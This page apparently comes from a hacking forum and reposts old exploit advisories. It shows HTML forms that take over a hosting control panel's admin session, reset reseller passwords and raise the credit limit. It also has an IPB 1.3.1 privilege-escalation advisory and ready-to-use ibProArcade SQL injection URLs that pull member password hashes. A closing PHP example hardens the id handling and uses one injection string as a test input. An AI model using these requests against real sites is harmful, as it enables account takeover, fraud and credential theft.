<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>

===============================================

2- This code lists all of the resellers; then you must change the password of one of them and log in with it for the next step.

Note: Also with this code, anyone can increase their credit value and then buy any host.

<form action="http://[url]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>

===============================================

3- Now you must log in as the reseller whose password was changed in the last step. Now go to the user list; if there is a user, that will be enough, and if no user is available, you must make one! Now select it and click Enter to enter as that user.
Now the bug will be available: each reseller can gain any user's session, even "HCADMIN", through a bug in "Check_Password.asp". The code below will help you:

<hr><br>
Form1<br>
<form action="http://[url]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>

===============================================

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]

Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)

Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all HC bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code in simple VB)

# milw0rm.com [2006-07-06]

vns3curity(HCE)

IBP Exploits 1.3.1

Quote:

Advisory number VI

+++++++++++++++++++++
+       ____        +
+  ||| )  ||  ||    +
+  ||| ) __ ||_||   +
+  |___) |__| | _ | +
+  ||      ||  ||   +
+  ||      ||  ||   +
+                   +
+++++++++++++++++++++
http://pro-hack.ru

Product: IBP <= 1.3.1
Programming language: php
Particulars: the exploit shows an interesting method of guessing a field with the help of LIKE (very simple).
Security searching: Advice
Bug level: Moderate
A moderator can raise their own privileges on the forum.
Insufficient filtering of data:

if ($ibforums->input['move_id'] == "" or $ibforums->input['move_id'] == -1)
{
    $std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_no_forum' ) );
}
//
if ($ibforums->input['move_id'] == $ibforums->input['sf'])
{
    $std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_same_forum' ) );
}
//
$DB->query("SELECT id, subwrap, sub_can_post, name, redirect_on FROM ibf_forums WHERE id IN(".$ibforums->input['sf'].",".$ibforums->input['move_id'].")");

http://pro-hack.org/exploits/our/ipb1.3_m_t_a.txt

Translate it yourselves, taken from Pro-hack.ru. Does anyone have any thoughts?

QX147(HCE)

ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit

IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulletin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
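Both bugs quoted in this thread have the same shape: an integer id (move_id and sf in the IPB thread-move code, user in the ibProArcade report module) is taken from the request as a raw string and concatenated into SQL, so a value like -1 union select ... becomes part of the query. The following is an added example written for this page, not code from IPB or ibProArcade. The function names positive_int_id, build_move_query and build_report_query are chosen here, the report query's column list is assumed (the page does not show that module's query), and the sample inputs at the bottom are constructed. It shows the hardened form of the quoted thread-move check: every id is validated as a positive integer before the query text is built, so the original "" and -1 guard still applies and nothing but digits can reach the IN() list.

```php
<?php
// Added example for this page; not IPB's or ibProArcade's own code.
// The quoted bugs concatenate raw request strings into SQL; here each id
// is validated as a positive integer before any query text is assembled.

// Return $raw as a positive integer, or 0 when it is absent, empty,
// negative, non-numeric or carries anything beyond decimal digits.
// A string such as "-1 union select ..." therefore never reaches a query.
function positive_int_id($raw)
{
    if (!is_string($raw) && !is_int($raw)) {
        return 0;
    }
    return preg_match('/^[1-9][0-9]*$/', (string) $raw) ? (int) $raw : 0;
}

// Hardened version of the quoted thread-move check. Returns either
// array('error' => <message key>) or array('sql' => <query text>), so a
// caller can hand the error to $std->Error() and the query to $DB->query()
// in the same way the original code does.
function build_move_query(array $input)
{
    $move_id = positive_int_id(isset($input['move_id']) ? $input['move_id'] : '');
    $sf      = positive_int_id(isset($input['sf'])      ? $input['sf']      : '');

    // 0 now covers both of the original "" and -1 cases.
    if ($move_id == 0) {
        return array('error' => 'move_no_forum');
    }
    if ($move_id == $sf) {
        return array('error' => 'move_same_forum');
    }
    // Only integers are interpolated, so the IN() list cannot be extended.
    return array('sql' => 'SELECT id, subwrap, sub_can_post, name, redirect_on '
                        . 'FROM ibf_forums WHERE id IN(' . $sf . ',' . $move_id . ')');
}

// The same treatment for the arcade report module's "user" parameter.
// The column list is an assumption for illustration only.
function build_report_query(array $input)
{
    $user = positive_int_id(isset($input['user']) ? $input['user'] : '');
    if ($user == 0) {
        return array('error' => 'report_no_user');
    }
    return array('sql' => 'SELECT id, name FROM ibf_members WHERE id=' . $user);
}

// Constructed request inputs (not taken from the page) for a CLI self-check:
//   php hardened_ids.php
$cases = array(
    array('move_id' => '12', 'sf' => '3'),                 // normal move
    array('move_id' => '',   'sf' => '3'),                 // no target forum
    array('move_id' => '-1', 'sf' => '3'),                 // sentinel value
    array('move_id' => '3',  'sf' => '3'),                 // same forum
    array('move_id' => '-1 union select 1', 'sf' => '3'),  // injection attempt, rejected
    array('user'    => '-1 union select 1'),               // report module, rejected
);
foreach ($cases as $c) {
    $result = isset($c['user']) ? build_report_query($c) : build_move_query($c);
    echo json_encode($c), ' => ', json_encode($result), "\n";
}
```

Rejecting anything that is not a string of decimal digits (rather than silently casting with intval) keeps the behaviour explicit: a malformed id produces the existing move_no_forum error instead of being quietly mapped to some other forum, and the audit trail shows the rejected request.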